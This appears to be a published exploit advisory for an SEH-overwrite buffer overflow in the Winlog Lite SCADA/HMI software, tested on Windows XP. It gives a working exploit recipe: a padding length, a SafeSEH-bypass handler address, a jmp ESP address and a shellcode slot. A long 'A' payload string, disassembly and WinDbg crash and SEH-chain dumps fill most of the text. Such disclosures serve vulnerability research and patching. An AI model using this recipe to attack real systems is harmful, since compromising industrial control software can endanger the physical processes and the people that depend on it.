###################################################################################### # Vuln Title: Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability # # Author: FaryadR (a.k.a Ciph3r) # tested on : winXp sp3 and Winlog Lite 2.06.17 Version # Twitter : https://twitter.com/faryadR # Mail : Ciph3r.secure@gmail.com # Website : http://0c0c0c0c.com # Vendor : http://www.sielcosistemi.com # # ###################################################################################### [+] Application Description : Winlog Lite is the entry level version of the SCADA/HMI software Winlog Pro offered by Sielco Sistemi to allow an evaluation of the potentiality and the simplicity of use of the package; Winlog Lite is also a powerful and low cost solution for creation of small supervisory applications. Winlog Lite makes available most of development tools and functions provided by the Winlog Pro software package, but limits the possibility to develop and to run applications up to a max of 24 tags. Winlog Lite does not include Symbol Factory library and web support. Winlog Lite can be executed both in Demo mode (without need of registration) and Full mode; in Demo mode, communication with external devices and sampling of external tags automatically stops after 15 minutes (if required, it can be restarted manually); in Full mode communication goes on without any limit of time. [+]Proof Of Concept : After run Winlog Lite SCADA HMI SYSTEM go to Tools Menu and Application Builder So , we can injected our Data to Application Name and Select Build Bottom after attach program to debugger : 9986 byte A + Pointer to next SEH record (6 byte jmp) + SE handler --> Non-SafeSEH Address for bypass SafeSEH Protection(0x32450A7B) + NOP + jmp ESP (0x7C86467B) + shellcode AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 00385319 90 NOP 0038531A 90 NOP 0038531B 90 NOP 0038531C 55 PUSH EBP 0038531D 8BEC MOV EBP,ESP 0038531F 53 PUSH EBX 00385320 8B00 MOV EAX,DWORD PTR DS:[EAX] 00385322 8B12 MOV EDX,DWORD PTR DS:[EDX] 00385324 E8 AD020000 CALL 00385329 0F94C0 SETE AL 0038532C 83E0 01 AND EAX,1 0038532F 5B POP EBX 00385330 5D POP EBP 00385331 C3 RETN 00385332 90 NOP 00385333 90 NOP 00385334 55 PUSH EBP 00385335 8BEC MOV EBP,ESP 00385337 53 PUSH EBX 00385338 8B00 MOV EAX,DWORD PTR DS:[EAX] --------> Crashed! 0038533A 8B12 MOV EDX,DWORD PTR DS:[EDX] 0038533C E8 95020000 CALL 00385341 0F95C0 SETNE AL 00385344 83E0 01 AND EAX,1 00385347 5B POP EBX 00385348 5D POP EBP 00385349 C3 RETN 0038534A 90 NOP 0038534B 90 NOP 0038534C 55 PUSH EBP 0038534D 8BEC MOV EBP,ESP 0038534F 83C4 CC ADD ESP,-34 00385352 53 PUSH EBX 00385353 894D F8 MOV DWORD PTR SS:[EBP-8],ECX 00385356 8955 D0 MOV DWORD PTR SS:[EBP-30],EDX 00385359 8BD8 MOV EBX,EAX 0038535B B8 007B3800 MOV EAX,DbfIntf.00387B00 00385360 E8 C3FDFFFF CALL DbfIntf.00385128 [+] Attributes: thunk ; __fastcall Dbf_fields::TDbfFieldDefs::TDbfFieldDefs(Classes::TPersistent *) @Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent proc near jmp ds:__imp_@Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent ; Dbf_fields::TDbfFieldDefs::TDbfFieldDefs(Classes::TPersistent *) @Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent endp (1cec.1e7c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=00000000 ecx=00000000 edx=0012cae4 esi=0012cb74 edi=41414141 eip=00385338 esp=0012ca94 ebp=0012ca98 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 *** WARNING: Unable to verify checksum for C:\Program Files\Winlog Lite\Bin\DbfIntf.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Winlog Lite\Bin\DbfIntf.dll - DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c: 00385338 8b00 mov eax,dword ptr [eax] ds:0023:41414141=???????? 0:000> u DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c: 00385338 8b00 mov eax,dword ptr [eax] 0038533a 8b12 mov edx,dword ptr [edx] 0038533c e895020000 call DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0xb0a (003855d6) 00385341 0f95c0 setne al 00385344 83e001 and eax,1 00385347 5b pop ebx 00385348 5d pop ebp 00385349 c3 ret 0:000> !exchain 0012caac: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a) 0012cb24: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a) 0012f2ec: +43434342 (43434343) Invalid exception stack at 42424242 0:000> kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 0012ca98 003816dd 41414141 0012cba0 00000000 DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c 0012caf4 0038219f 0012cb70 41414141 0012cb74 DbfIntf+0x16dd *** WARNING: Unable to verify checksum for C:\Program Files\Winlog Lite\Bin\ABuilder.exe *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Winlog Lite\Bin\ABuilder.exe - 0012cb80 00404098 41414141 00000001 0012cba0 DbfIntf!DbiCreateTable+0xf3 0012f314 41414141 41414141 41414141 41414141 ABuilder!FormsTForm$bdtr$qqrv+0x15f4 0012f318 41414141 41414141 41414141 41414141 +0x41414140 0012f31c 41414141 41414141 41414141 41414141 +0x41414140 0012f320 41414141 41414141 41414141 41414141 +0x41414140 0012f324 41414141 41414141 41414141 41414141 +0x41414140 0012f328 41414141 41414141 41414141 41414141 +0x41414140 0012f32c 41414141 41414141 41414141 41414141 +0x41414140 0012f330 41414141 41414141 41414141 41414141 +0x41414140 0012f334 41414141 41414141 41414141 41414141 +0x41414140 0012f338 41414141 41414141 41414141 41414141 +0x41414140 0012f33c 41414141 41414141 41414141 41414141 +0x41414140 0012f340 41414141 41414141 41414141 41414141 +0x41414140 0012f344 41414141 41414141 41414141 41414141 +0x41414140 0012f348 41414141 41414141 41414141 41414141 +0x41414140 0012f34c 41414141 41414141 41414141 41414141 +0x41414140 0012f350 41414141 41414141 41414141 41414141 +0x41414140 0012f354 41414141 41414141 41414141 41414141 +0x41414140 [+] 0verwrite SEH Pointer : 0012F2D4 41414141 AAAA 0012F2D8 41414141 AAAA 0012F2DC 41414141 AAAA 0012F2E0 41414141 AAAA 0012F2E4 41414141 AAAA 0012F2E8 41414141 AAAA 0012F2EC 42424242 BBBB Pointer to next SEH record 0012F2F0 43434343 CCCC SE handler 0012F2F4 41414141 AAAA 0012F2F8 41414141 AAAA 0012F2FC 41414141 AAAA 0012F300 41414141 AAAA 0012F304 41414141 AAAA 0012F308 41414141 AAAA 0012F30C 41414141 AAAA